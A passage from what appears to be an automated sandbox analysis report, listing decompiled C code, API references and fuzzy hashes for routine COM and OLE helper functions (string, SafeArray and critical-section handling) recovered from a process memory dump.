                                                          • Part of subcall function 00B84689: VariantClear.OLEAUT32(?), ref: 00B84714
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.687768128.0000000000B80000.00000040.00020000.sdmp, Offset: 00B80000, based on PE: true
                                                        Similarity
                                                        • API ID: String$Alloc$??2@ArrayLoadSafe$ClearCreateElementTypeVariantmemcpy
                                                        • String ID:
                                                        • API String ID: 2003164717-0
                                                        • Opcode ID: b9d864dd7b56d1af16b766d1a69ad90d13ca266936d91fc5f6113dcb82e17f3b
                                                        • Instruction ID: 98b65e8fdbdc0a3908eabf93684970c25cecff5e7839d0c81c825b614b4ff18b
                                                        • Opcode Fuzzy Hash: b9d864dd7b56d1af16b766d1a69ad90d13ca266936d91fc5f6113dcb82e17f3b
                                                        • Instruction Fuzzy Hash: 4641837594021A9BCB21EF68CC84A9AB7F9EF94B00F1508E9E549D7221DF70DE41CFA0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00B8F55F, Relevance: 6.1, APIs: 4, Instructions: 113COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 55%
                                                        			E00B8F55F(void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, char _a16) {
				void* _v8;
				void* _v12;
				char _v16;
				char _v20;
				char _v24;
				char* _t36;
				intOrPtr* _t37;
				intOrPtr* _t38;
				intOrPtr* _t44;
				intOrPtr* _t46;
				intOrPtr* _t54;
				intOrPtr* _t56;
				intOrPtr* _t58;
				intOrPtr* _t60;
				char* _t61;
				intOrPtr* _t73;
				char* _t74;

				_t36 =  &_v8;
				_v12 = 0;
				_v8 = 0;
				_v16 = 0;
				_v20 = 0;
				__imp__#202(_t36);
				_t74 = _t36;
				if(_t74 >= 0) {
					_t44 = _v8;
					_t74 =  *((intOrPtr*)( *_t44 + 0xc))(_t44, _a4);
					if(_t74 >= 0) {
						_t46 = _v8;
						_t74 =  *((intOrPtr*)( *_t46 + 0x10))(_t46, _a8);
						if(_t74 >= 0) {
							if(E00B83A91(__edx,  &_v16, _a12) != 0) {
								_v24 =  &_a16;
								_t74 = E00B82CB9(__edx, _v16,  &_v20,  &_v24);
								_v24 = 0;
								if(_t74 >= 0) {
									_t54 = _v8;
									_t74 =  *((intOrPtr*)( *_t54 + 0x14))(_t54, _v20);
									if(_t74 >= 0) {
										_t56 = _v8;
										_t74 =  *((intOrPtr*)( *_t56 + 0x18))(_t56, 0);
										if(_t74 >= 0) {
											_t58 = _v8;
											_t74 =  *((intOrPtr*)( *_t58 + 0x1c))(_t58, 0);
											if(_t74 >= 0) {
												_t60 = _v8;
												_t61 =  *((intOrPtr*)( *_t60))(_t60, 0xb89c18,  &_v12);
												_t74 = _t61;
												if(_t74 >= 0) {
													__imp__#201(0, _v12);
													_t74 = _t61;
												}
											}
										}
									}
								}
							} else {
								_t74 = 0x8007000e;
							}
						}
					}
				}
				_t37 = _v8;
				if(_t37 != 0) {
					 *((intOrPtr*)( *_t37 + 8))(_t37);
				}
				_t38 = _v12;
				if(_t38 != 0) {
					 *((intOrPtr*)( *_t38 + 8))(_t38);
				}
				_t73 = __imp__#6;
				 *_t73(_v16);
				 *_t73(_v20);
				return _t74;
			}




















                                                        0x00b8f56b
                                                        0x00b8f56f
                                                        0x00b8f572
                                                        0x00b8f575
                                                        0x00b8f578
                                                        0x00b8f57b
                                                        0x00b8f581
                                                        0x00b8f585
                                                        0x00b8f58b
                                                        0x00b8f597
                                                        0x00b8f59b
                                                        0x00b8f5a1
                                                        0x00b8f5ad
                                                        0x00b8f5b1
                                                        0x00b8f5c5
                                                        0x00b8f5d1
                                                        0x00b8f5e4
                                                        0x00b8f5e8
                                                        0x00b8f5eb
                                                        0x00b8f5ed
                                                        0x00b8f5f9
                                                        0x00b8f5fd
                                                        0x00b8f5ff
                                                        0x00b8f609
                                                        0x00b8f60d
                                                        0x00b8f60f
                                                        0x00b8f619
                                                        0x00b8f61d
                                                        0x00b8f61f
                                                        0x00b8f62e
                                                        0x00b8f630
                                                        0x00b8f634
                                                        0x00b8f63a
                                                        0x00b8f640
                                                        0x00b8f640
                                                        0x00b8f634
                                                        0x00b8f61d
                                                        0x00b8f60d
                                                        0x00b8f5fd
                                                        0x00b8f5c7
                                                        0x00b8f5c7
                                                        0x00b8f5c7
                                                        0x00b8f5c5
                                                        0x00b8f5b1
                                                        0x00b8f59b
                                                        0x00b8f642
                                                        0x00b8f647
                                                        0x00b8f64c
                                                        0x00b8f64c
                                                        0x00b8f64f
                                                        0x00b8f654
                                                        0x00b8f659
                                                        0x00b8f659
                                                        0x00b8f65f
                                                        0x00b8f665
                                                        0x00b8f66a
                                                        0x00b8f671

                                                        APIs
                                                        • CreateErrorInfo.OLEAUT32(?,?,00000000,?,?), ref: 00B8F57B
                                                        • SetErrorInfo.OLEAUT32(00000000,?), ref: 00B8F63A
                                                        • SysFreeString.OLEAUT32(?), ref: 00B8F665
                                                        • SysFreeString.OLEAUT32(?), ref: 00B8F66A
                                                          • Part of subcall function 00B83A91: LoadStringW.USER32(?,?,00000800,?), ref: 00B83ADB
                                                          • Part of subcall function 00B83A91: SysAllocString.OLEAUT32(?), ref: 00B83AF2
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.687768128.0000000000B80000.00000040.00020000.sdmp, Offset: 00B80000, based on PE: true
                                                        Similarity
                                                        • API ID: String$ErrorFreeInfo$AllocCreateLoad
                                                        • String ID:
                                                        • API String ID: 3761032807-0
                                                        • Opcode ID: 7546fe3262956aafe84d9ef921f7b5182a2559cf10595973e1a595c2c2e57c42
                                                        • Instruction ID: 1bce28f3b411df608674ef4481037731f8bb505b926e5766b2fcf8d63f791a82
                                                        • Opcode Fuzzy Hash: 7546fe3262956aafe84d9ef921f7b5182a2559cf10595973e1a595c2c2e57c42
                                                        • Instruction Fuzzy Hash: 9841FD75D00119AFCB11FFA8C8488AEF7F9FF987107254AE5E815E7220E6319E41DBA0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00B8EFA7, Relevance: 6.1, APIs: 4, Instructions: 81stringCOMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 92%
                                                        			E00B8EFA7(signed int* __ecx, WCHAR* _a4) {
				intOrPtr _t36;
				int _t37;
				signed int _t39;
				signed int _t42;
				signed int _t44;
				signed int _t45;
				signed int _t46;
				signed int _t49;
				signed int _t66;
				signed int _t68;
				signed int _t72;
				signed int* _t73;
				void* _t76;

				_t73 = __ecx;
				_t36 =  *((intOrPtr*)(__ecx + 8));
				_t76 =  *(__ecx + 4) - _t36;
				if(_t76 != 0) {
					L9:
					_t37 = lstrlenW(_a4);
					_t71 = _t37 + 1;
					_t66 = 2;
					_t39 = (_t37 + 1) * _t66;
					_push( ~(0 | __eflags > 0x00000000) | _t39);
					L00B82877();
					_t49 = _t39;
					__eflags = _t49;
					if(_t49 != 0) {
						E00B831BD(_t49, _t71, _a4);
						 *( *_t73 + _t73[1] * 4) = _t49;
						_t73[1] = _t73[1] + 1;
						_t42 = 0;
						__eflags = 0;
					} else {
						_t42 = 0x8007000e;
					}
					return _t42;
				}
				_t68 = 4;
				_t44 = (_t36 + 0xa) * _t68;
				_push( ~(0 | _t76 > 0x00000000) | _t44);
				L00B82877();
				_t72 = _t44;
				if(_t72 != 0) {
					 *((intOrPtr*)(__ecx + 8)) =  *((intOrPtr*)(__ecx + 8)) + 0xa;
					_t45 = 0;
					__eflags =  *(__ecx + 4);
					if( *(__ecx + 4) <= 0) {
						L5:
						_t46 = _t73[1];
						while(1) {
							__eflags = _t46 - _t73[2];
							if(__eflags >= 0) {
								break;
							}
							 *(_t72 + _t46 * 4) =  *(_t72 + _t46 * 4) & 0x00000000;
							_t46 = _t46 + 1;
							__eflags = _t46;
						}
						_push( *_t73);
						L00B82082();
						 *_t73 = _t72;
						goto L9;
					} else {
						goto L4;
					}
					do {
						L4:
						 *((intOrPtr*)(_t72 + _t45 * 4)) =  *((intOrPtr*)( *((intOrPtr*)(__ecx)) + _t45 * 4));
						_t45 = _t45 + 1;
						__eflags = _t45 -  *(__ecx + 4);
					} while (_t45 <  *(__ecx + 4));
					goto L5;
				}
				return 0x8007000e;
			}
















                                                        0x00b8efad
                                                        0x00b8efaf
                                                        0x00b8efb3
                                                        0x00b8efb6
                                                        0x00b8f00f
                                                        0x00b8f013
                                                        0x00b8f01b
                                                        0x00b8f020
                                                        0x00b8f023
                                                        0x00b8f02c
                                                        0x00b8f02d
                                                        0x00b8f032
                                                        0x00b8f035
                                                        0x00b8f037
                                                        0x00b8f045
                                                        0x00b8f052
                                                        0x00b8f055
                                                        0x00b8f058
                                                        0x00b8f058
                                                        0x00b8f039
                                                        0x00b8f039
                                                        0x00b8f039
                                                        0x00000000
                                                        0x00b8f05a
                                                        0x00b8efbf
                                                        0x00b8efc0
                                                        0x00b8efc9
                                                        0x00b8efca
                                                        0x00b8efcf
                                                        0x00b8efd4
                                                        0x00b8efdd
                                                        0x00b8efe1
                                                        0x00b8efe3
                                                        0x00b8efe6
                                                        0x00b8eff6
                                                        0x00b8eff6
                                                        0x00b8f000
                                                        0x00b8f000
                                                        0x00b8f003
                                                        0x00000000
                                                        0x00000000
                                                        0x00b8effb
                                                        0x00b8efff
                                                        0x00b8efff
                                                        0x00b8efff
                                                        0x00b8f005
                                                        0x00b8f007
                                                        0x00b8f00d
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00b8efe8
                                                        0x00b8efe8
                                                        0x00b8efed
                                                        0x00b8eff0
                                                        0x00b8eff1
                                                        0x00b8eff1
                                                        0x00000000
                                                        0x00b8efe8
                                                        0x00000000

                                                        APIs
                                                        • ??2@YAPAXI@Z.MSVCRT ref: 00B8EFCA
                                                        • ??3@YAXPAX@Z.MSVCRT ref: 00B8F007
                                                        • lstrlenW.KERNEL32(?,80000003,80000001,?,?,00B87AC8,00000000,00B83C8C,80000001,?,?), ref: 00B8F013
                                                        • ??2@YAPAXI@Z.MSVCRT ref: 00B8F02D
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.687768128.0000000000B80000.00000040.00020000.sdmp, Offset: 00B80000, based on PE: true
                                                        Similarity
                                                        • API ID: ??2@$??3@lstrlen
                                                        • String ID:
                                                        • API String ID: 78001279-0
                                                        • Opcode ID: be3603ce97ca058ccec84cdbb50fc9977071712c6b7fa858f70127497ce89c77
                                                        • Instruction ID: 771f67ef6f7f91fdf80f878005926a61d61ca62f538f7d6b5ed70d1cc244c0d7
                                                        • Opcode Fuzzy Hash: be3603ce97ca058ccec84cdbb50fc9977071712c6b7fa858f70127497ce89c77
                                                        • Instruction Fuzzy Hash: 9021D572200642AFD724AF28D845A36B7E4EF85765720887DF697CB6B1DA72E841CB40
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00B83A91, Relevance: 6.1, APIs: 4, Instructions: 62memoryCOMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 68%
                                                        			E00B83A91(void* __edx, intOrPtr* _a4, int _a8) {
				signed int _v8;
				char _v2056;
				short _v6152;
				int _v6156;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t16;
				int _t20;
				int _t24;
				WCHAR* _t25;
				void* _t30;
				void* _t33;
				intOrPtr* _t34;
				signed int _t35;
				intOrPtr _t36;

				_t30 = __edx;
				E00B8321E(0x1808);
				_t16 =  *0xb97004; // 0xbb40e64e
				_v8 = _t16 ^ _t35;
				_t34 = _a4;
				 *_t34 = 0;
				_v6156 = 0;
				_t36 =  *0xb97001; // 0x0
				if(_t36 == 0) {
					if(LoadStringA( *0xb97020, _a8,  &_v2056, 0x800) == 0) {
						goto L4;
					} else {
						_t24 = MultiByteToWideChar(0, 0,  &_v2056, 0xffffffff,  &_v6152, 0x800);
						goto L2;
					}
				} else {
					_t24 = LoadStringW( *0xb97020, _a8,  &_v6152, 0x800);
					L2:
					_v6156 = _t24;
					if(_t24 == 0) {
						L4:
						_t20 = _v6156;
					} else {
						_t25 =  &_v6152;
						__imp__#2(_t25);
						 *_t34 = _t25;
						if(_t25 == 0) {
							_t20 = 0;
						} else {
							goto L4;
						}
					}
				}
				_pop(_t33);
				return E00B81335(_t20, 0, _v8 ^ _t35, _t30, _t33, _t34);
			}



















                                                        0x00b83a91
                                                        0x00b83a9b
                                                        0x00b83aa0
                                                        0x00b83aa7
                                                        0x00b83aac
                                                        0x00b83ab1
                                                        0x00b83ab4
                                                        0x00b83aba
                                                        0x00b83ac0
                                                        0x00b89522
                                                        0x00000000
                                                        0x00b89528
                                                        0x00b8953b
                                                        0x00000000
                                                        0x00b8953b
                                                        0x00b83ac6
                                                        0x00b83adb
                                                        0x00b83ae1
                                                        0x00b83ae1
                                                        0x00b83ae9
                                                        0x00b83b02
                                                        0x00b83b02
                                                        0x00b83aeb
                                                        0x00b83aeb
                                                        0x00b83af2
                                                        0x00b83af8
                                                        0x00b83afc
                                                        0x00b89546
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00b83afc
                                                        0x00b83ae9
                                                        0x00b83b0b
                                                        0x00b83b16

                                                        APIs
                                                        • LoadStringW.USER32(?,?,00000800,?), ref: 00B83ADB
                                                        • SysAllocString.OLEAUT32(?), ref: 00B83AF2
                                                        • LoadStringA.USER32 ref: 00B8951A
                                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000800,?,00000000,?,00B887C6,?,?,?,?), ref: 00B8953B
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.687768128.0000000000B80000.00000040.00020000.sdmp, Offset: 00B80000, based on PE: true
                                                        Similarity
                                                        • API ID: String$Load$AllocByteCharMultiWide
                                                        • String ID:
                                                        • API String ID: 1944948655-0
                                                        • Opcode ID: a5d321e337d34d50731613ceb6920a7345afc15659acc3c93706a5c35079e677
                                                        • Instruction ID: a887ac67a945517046c5533e5313ac7d1b4f2b8b57886eca4e30bcd4d57b8888
                                                        • Opcode Fuzzy Hash: a5d321e337d34d50731613ceb6920a7345afc15659acc3c93706a5c35079e677
                                                        • Instruction Fuzzy Hash: 00114CB694021CAFDB51AF64DD849EABBFCEB0D711B1484AAB545D7160DE309F88CF10
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00B92FA6, Relevance: 6.1, APIs: 4, Instructions: 62COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • VariantInit.OLEAUT32(?), ref: 00B92FB7
                                                        • SafeArrayGetElement.OLEAUT32(?,00000000,?), ref: 00B92FE8
                                                          • Part of subcall function 00B93A92: SysStringLen.OLEAUT32(?), ref: 00B93AA2
                                                          • Part of subcall function 00B93A92: SysStringLen.OLEAUT32(?), ref: 00B93AA9
                                                        • VariantClear.OLEAUT32(?), ref: 00B93007
                                                        • VariantClear.OLEAUT32(?), ref: 00B9302E
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.687768128.0000000000B80000.00000040.00020000.sdmp, Offset: 00B80000, based on PE: true
                                                        Similarity
                                                        • API ID: Variant$ClearString$ArrayElementInitSafe
                                                        • String ID:
                                                        • API String ID: 598207039-0
                                                        • Opcode ID: a88e103b9fd359d2996e62a1276e0b6b124c0eeea92211ea98b1a5c5824caed9
                                                        • Instruction ID: 9b907791002e51b91f717a196be934e78e24a7c7fee23c3c947a129aa9c2d50b
                                                        • Opcode Fuzzy Hash: a88e103b9fd359d2996e62a1276e0b6b124c0eeea92211ea98b1a5c5824caed9
                                                        • Instruction Fuzzy Hash: E411F876900109ABCF11DBA8C989ADEBBF9FF88751F1144A5EA15E3210EB30DE45CB60
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00B93DEC, Relevance: 6.1, APIs: 4, Instructions: 60COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 33%
                                                        			E00B93DEC(intOrPtr* __eax, intOrPtr _a4, intOrPtr* _a8) {
				intOrPtr* _t14;
				intOrPtr* _t16;
				void* _t18;
				intOrPtr* _t19;
				intOrPtr* _t23;
				intOrPtr* _t24;

				_t10 = __eax;
				_push(0x18);
				L00B82877();
				if(__eax == 0) {
					_t24 = 0;
				} else {
					_t10 = E00B93DCF(__eax);
					_t24 = _t10;
				}
				if(_t24 != 0) {
					_t1 = _t24 + 0xc; // 0xc
					_t19 = _t1;
					__imp__#20(_a4, 1, _t19, _t18);
					_t23 = _t10;
					if(_t23 >= 0) {
						_t3 = _t24 + 0x10; // 0x10
						_t14 = _t3;
						__imp__#19(_a4, 1, _t14);
						_t23 = _t14;
						if(_t23 >= 0) {
							 *((intOrPtr*)(_t24 + 8)) =  *_t19;
							_t6 = _t24 + 0x14; // 0x14
							_t16 = _t6;
							__imp__#27(_a4, _t16);
							_t23 = _t16;
							if(_t23 >= 0) {
								 *_a8 = _t24;
								_t24 = 0;
								_t23 = 0;
							}
						}
					}
					if(_t24 != 0) {
						 *((intOrPtr*)( *_t24 + 8))(_t24);
					}
					goto L11;
				} else {
					_t23 = 0x8007000e;
					L11:
					return _t23;
				}
			}









                                                        0x00b93dec
                                                        0x00b93df3
                                                        0x00b93df5
                                                        0x00b93dfd
                                                        0x00b93e0a
                                                        0x00b93dff
                                                        0x00b93e01
                                                        0x00b93e06
                                                        0x00b93e06
                                                        0x00b93e0e
                                                        0x00b93e18
                                                        0x00b93e18
                                                        0x00b93e21
                                                        0x00b93e27
                                                        0x00b93e2b
                                                        0x00b93e2d
                                                        0x00b93e2d
                                                        0x00b93e36
                                                        0x00b93e3c
                                                        0x00b93e40
                                                        0x00b93e44
                                                        0x00b93e47
                                                        0x00b93e47
                                                        0x00b93e4e
                                                        0x00b93e54
                                                        0x00b93e58
                                                        0x00b93e5d
                                                        0x00b93e5f
                                                        0x00b93e61
                                                        0x00b93e61
                                                        0x00b93e58
                                                        0x00b93e40
                                                        0x00b93e66
                                                        0x00b93e6b
                                                        0x00b93e6b
                                                        0x00000000
                                                        0x00b93e10
                                                        0x00b93e10
                                                        0x00b93e6e
                                                        0x00b93e73
                                                        0x00b93e73

                                                        APIs
                                                        • ??2@YAPAXI@Z.MSVCRT ref: 00B93DF5
                                                        • SafeArrayGetLBound.OLEAUT32(?,00000001,0000000C), ref: 00B93E21
                                                        • SafeArrayGetUBound.OLEAUT32(?,00000001,00000010), ref: 00B93E36
                                                        • SafeArrayCopy.OLEAUT32(?,00000014), ref: 00B93E4E
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.687768128.0000000000B80000.00000040.00020000.sdmp, Offset: 00B80000, based on PE: true
                                                        Similarity
                                                        • API ID: ArraySafe$Bound$??2@Copy
                                                        • String ID:
                                                        • API String ID: 1857560380-0
                                                        • Opcode ID: b5052215adcd07e01ec5f16e0b4b89b8657d3db38098342bd6072f591dc2b9bc
                                                        • Instruction ID: 42bb51721958be623f9830ee83ad39ff6a46d6d3e27c5f4cb258cf0025266f17
                                                        • Opcode Fuzzy Hash: b5052215adcd07e01ec5f16e0b4b89b8657d3db38098342bd6072f591dc2b9bc
                                                        • Instruction Fuzzy Hash: 0F11C236100A19ABCB229F59C884A5A7BE9EFC4F60B114875F805CB220DB30DD41C7B0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00B8171F, Relevance: 6.1, APIs: 4, Instructions: 60COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 82%
                                                        			E00B8171F(intOrPtr _a4, void* _a8, intOrPtr _a12, signed int* _a16) {
				intOrPtr _t22;
				intOrPtr* _t24;
				intOrPtr _t26;
				signed int _t27;
				intOrPtr _t40;
				intOrPtr _t41;
				intOrPtr _t44;

				 *_a16 =  *_a16 & 0x00000000;
				if(_a8 != 0) {
					return 0x8002000b;
				}
				_t40 = _a4;
				_t44 =  *((intOrPtr*)(_t40 + 0x14));
				EnterCriticalSection(0xb97034);
				if( *(_t44 + 0x1c) == 0) {
					_t22 =  *((intOrPtr*)(_t40 + 0x14));
					__imp__#162( *((intOrPtr*)(_t22 + 0x10)),  *(_t22 + 0x18) & 0x0000ffff, 0, _a12,  &_a8);
					_a4 = _t22;
					if(_t22 >= 0) {
						_t41 = E00B83F8A(_t40, _a8);
						_t24 = _a8;
						 *((intOrPtr*)( *_t24 + 8))(_t24);
						if(_t41 < 0) {
							L3:
							LeaveCriticalSection(0xb97034);
							_t26 = _t41;
							L4:
							return _t26;
						}
						goto L2;
					}
					LeaveCriticalSection(0xb97034);
					_t26 = _a4;
					goto L4;
				}
				L2:
				_t27 =  *(_t44 + 0x1c);
				 *((intOrPtr*)( *_t27 + 4))(_t27);
				 *_a16 =  *(_t44 + 0x1c);
				_t41 = 0;
				goto L3;
			}










                                                        0x00b81727
                                                        0x00b8172e
                                                        0x00000000
                                                        0x00b89a63
                                                        0x00b81737
                                                        0x00b8173a
                                                        0x00b81743
                                                        0x00b8174d
                                                        0x00b89a6d
                                                        0x00b89a81
                                                        0x00b89a87
                                                        0x00b89a8c
                                                        0x00b89aa7
                                                        0x00b89aa9
                                                        0x00b89aaf
                                                        0x00b81778
                                                        0x00b81766
                                                        0x00b81767
                                                        0x00b8176d
                                                        0x00b8176f
                                                        0x00000000
                                                        0x00b81771
                                                        0x00000000
                                                        0x00b8177a
                                                        0x00b89a8f
                                                        0x00b89a95
                                                        0x00000000
                                                        0x00b89a95
                                                        0x00b81753
                                                        0x00b81753
                                                        0x00b81759
                                                        0x00b81762
                                                        0x00b81764
                                                        0x00000000

                                                        APIs
                                                        • EnterCriticalSection.KERNEL32(00B97034,?,?,?,?,00B81716,?,?,?,?), ref: 00B81743
                                                        • LeaveCriticalSection.KERNEL32(00B97034,?,?,?,?,00B81716,?,?,?,?), ref: 00B81767
                                                        • LoadRegTypeLib.OLEAUT32(?,?,00000000,?,00000000), ref: 00B89A81
                                                        • LeaveCriticalSection.KERNEL32(00B97034,?,?,?,?,00B81716,?,?,?,?), ref: 00B89A8F
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.687768128.0000000000B80000.00000040.00020000.sdmp, Offset: 00B80000, based on PE: true
                                                        Similarity
                                                        • API ID: CriticalSection$Leave$EnterLoadType
                                                        • String ID:
                                                        • API String ID: 2204791303-0
                                                        • Opcode ID: 713a065b1488affed7e8d6ee983268449d33b64ffadf7de73eec2b5d57cb497a
                                                        • Instruction ID: 3d817762e8b9d9f2387825b79252d740ad29dc36f7131cffcfbb8c91a6ddb393
                                                        • Opcode Fuzzy Hash: 713a065b1488affed7e8d6ee983268449d33b64ffadf7de73eec2b5d57cb497a
                                                        • Instruction Fuzzy Hash: 44114979200205EFCB149F28DC88A6A77F9FB84351F108859F80A8B261DB30ED42CB60
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00B91586, Relevance: 6.1, APIs: 4, Instructions: 57memorystringCOMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 59%
                                                        			E00B91586(void* __ebx, intOrPtr _a4, intOrPtr* _a8) {
				signed int _v8;
				short _v72;
				void* __edi;
				void* __esi;
				signed int _t14;
				signed int _t18;
				signed int _t20;
				short* _t21;
				WCHAR* _t25;
				void* _t26;
				short _t30;
				void* _t33;
				intOrPtr* _t34;
				intOrPtr _t35;
				signed int _t36;

				_t28 = __ebx;
				_t14 =  *0xb97004; // 0xbb40e64e
				_v8 = _t14 ^ _t36;
				_t35 = _a4;
				_t34 = _a8;
				if(_t34 != 0) {
					_t18 =  *( *((intOrPtr*)(_t35 + 0x40)) + 0xe) & 0x0000ffff;
					L00B93EE8();
					_t20 = lstrlenW( &_v72);
					_t21 = _t18 + _t20 * 2;
					_t30 = 0x2e;
					 *_t21 = _t30;
					L00B93EE8();
					_t25 =  &_v72;
					__imp__#2( *( *((intOrPtr*)(_t35 + 0x40)) + 0xc) & 0x0000ffff, _t21 + 2, 0xa, _t18,  &_v72, 0xa, __ebx);
					 *_t34 = _t25;
					_t28 = _t25;
					if(_t25 != 0) {
						_t26 = 0;
					} else {
						_t26 = 0x8007000e;
					}
				} else {
					_t26 = 0x80004003;
				}
				return E00B81335(_t26, _t28, _v8 ^ _t36, _t33, _t34, _t35);
			}


















                                                        0x00b91586
                                                        0x00b9158e
                                                        0x00b91595
                                                        0x00b91599
                                                        0x00b9159d
                                                        0x00b915a2
                                                        0x00b915b5
                                                        0x00b915ba
                                                        0x00b915c8
                                                        0x00b915d0
                                                        0x00b915d3
                                                        0x00b915d4
                                                        0x00b915e5
                                                        0x00b915ed
                                                        0x00b915f1
                                                        0x00b915f7
                                                        0x00b915f9
                                                        0x00b915fc
                                                        0x00b91605
                                                        0x00b915fe
                                                        0x00b915fe
                                                        0x00b915fe
                                                        0x00b915a4
                                                        0x00b915a4
                                                        0x00b915a4
                                                        0x00b91614

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.687768128.0000000000B80000.00000040.00020000.sdmp, Offset: 00B80000, based on PE: true
                                                        Similarity
                                                        • API ID: _itow$AllocStringlstrlen
                                                        • String ID:
                                                        • API String ID: 2661956110-0
                                                        • Opcode ID: 008e5ef6f6fd4d0ffa06017892a97e48eb14df564ba4eb912857962c324f4cfe
                                                        • Instruction ID: 9e0c31b070a0bab8bfc3c6e55adafc3f0e6ecddec92e327f3142f54c78c9f371
                                                        • Opcode Fuzzy Hash: 008e5ef6f6fd4d0ffa06017892a97e48eb14df564ba4eb912857962c324f4cfe
                                                        • Instruction Fuzzy Hash: 9911A172A00209ABCB00DFADD845AAEB3FCEB49710B110466F945EB250EB75EE01C795
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00B85DFD, Relevance: 6.0, APIs: 4, Instructions: 49COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 37%
                                                        			E00B85DFD(intOrPtr* __ecx) {
				intOrPtr* _t21;
				intOrPtr* _t22;
				signed int _t29;
				intOrPtr* _t34;
				intOrPtr* _t35;
				intOrPtr* _t40;
				intOrPtr* _t45;
				intOrPtr* _t46;
				intOrPtr* _t50;
				intOrPtr _t51;

				_t37 = __ecx;
				_t50 = __ecx;
				_t34 = __ecx + 0xc;
				 *__ecx = 0xb81e68;
				 *((intOrPtr*)(__ecx + 4)) = 0xb82274;
				 *((intOrPtr*)(__ecx + 8)) = 0xb82264;
				 *_t34 = 0xb81ebc;
				if( *((intOrPtr*)(__ecx + 0x28)) != 0) {
					__imp__#16(__eax);
				}
				_t21 =  *((intOrPtr*)(_t50 + 0x2c));
				if(_t21 != 0) {
					 *((intOrPtr*)( *_t21 + 8))(_t21);
				}
				_t22 =  *((intOrPtr*)(_t50 + 0x30));
				if(_t22 != 0) {
					 *((intOrPtr*)( *_t22 + 8))(_t22);
				}
				_t45 = __imp__#6;
				 *_t45( *((intOrPtr*)(_t50 + 0x40)));
				 *_t45( *((intOrPtr*)(_t50 + 0x44)));
				 *_t45( *((intOrPtr*)(_t50 + 0x3c)));
				_t46 = _t50 + 0x34;
				while( *_t46 != 0) {
					 *_t46 =  *((intOrPtr*)( *_t46 + 4));
					E00B92E38( *_t46);
				}
				_pop(_t44);
				_pop(_t50);
				_t37 = _t34;
				_pop(_t34);
				_push(_t34);
				_t35 = _t37;
				_push(_t50);
				_t51 =  *((intOrPtr*)(_t35 + 0x14));
				 *_t35 = 0xb814ec;
				if( *((char*)(_t35 + 0x18)) != 0) {
					_push(_t44);
					EnterCriticalSection(0xb97034);
					_t29 =  *(_t51 + 0x1c);
					if(_t29 != 0) {
						 *((intOrPtr*)( *_t29 + 8))(_t29);
					}
					 *(_t51 + 0x1c) =  *(_t51 + 0x1c) & 0x00000000;
					LeaveCriticalSection(0xb97034);
				}
				_t40 = _t35;
				 *_t40 = 0xb81518;
				return InterlockedDecrement(0xb97030);
			}













                                                        0x00b85dfd
                                                        0x00b85e01
                                                        0x00b85e06
                                                        0x00b85e0a
                                                        0x00b85e10
                                                        0x00b85e17
                                                        0x00b85e1e
                                                        0x00b85e26
                                                        0x00b85e29
                                                        0x00b85e29
                                                        0x00b85e2f
                                                        0x00b85e34
                                                        0x00b85e39
                                                        0x00b85e39
                                                        0x00b85e3c
                                                        0x00b85e41
                                                        0x00b85e46
                                                        0x00b85e46
                                                        0x00b85e4c
                                                        0x00b85e52
                                                        0x00b85e57
                                                        0x00b85e5c
                                                        0x00b85e5e
                                                        0x00b85e61
                                                        0x00b891c8
                                                        0x00b891cd
                                                        0x00b891cd
                                                        0x00b85e6a
                                                        0x00b85e6b
                                                        0x00b85e6c
                                                        0x00b85e6e
                                                        0x00b85cbe
                                                        0x00b85cbf
                                                        0x00b85cc5
                                                        0x00b85cc6
                                                        0x00b85cc9
                                                        0x00b85ccf
                                                        0x00b85cd1
                                                        0x00b85cd8
                                                        0x00b85cde
                                                        0x00b85ce3
                                                        0x00b85ce8
                                                        0x00b85ce8
                                                        0x00b85ceb
                                                        0x00b85cf0
                                                        0x00b85cf6
                                                        0x00b85cf8
                                                        0x00b85d05
                                                        0x00b85d11

                                                        APIs
                                                        • SafeArrayDestroy.OLEAUT32(?), ref: 00B85E29
                                                        • SysFreeString.OLEAUT32(?), ref: 00B85E52
                                                        • SysFreeString.OLEAUT32(?), ref: 00B85E57
                                                        • SysFreeString.OLEAUT32(?), ref: 00B85E5C
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.687768128.0000000000B80000.00000040.00020000.sdmp, Offset: 00B80000, based on PE: true
                                                        Similarity
                                                        • API ID: FreeString$ArrayDestroySafe
                                                        • String ID:
                                                        • API String ID: 4164600000-0
                                                        • Opcode ID: a4fc3f0c8513f56c146f10abfea46bc584a43a94cd7c753486a0b4997bc0db99
                                                        • Instruction ID: 39d94420518f418aa5568587d4bcb1a6a5cb6bcfb8437fb3da2d8236a8deb3d1
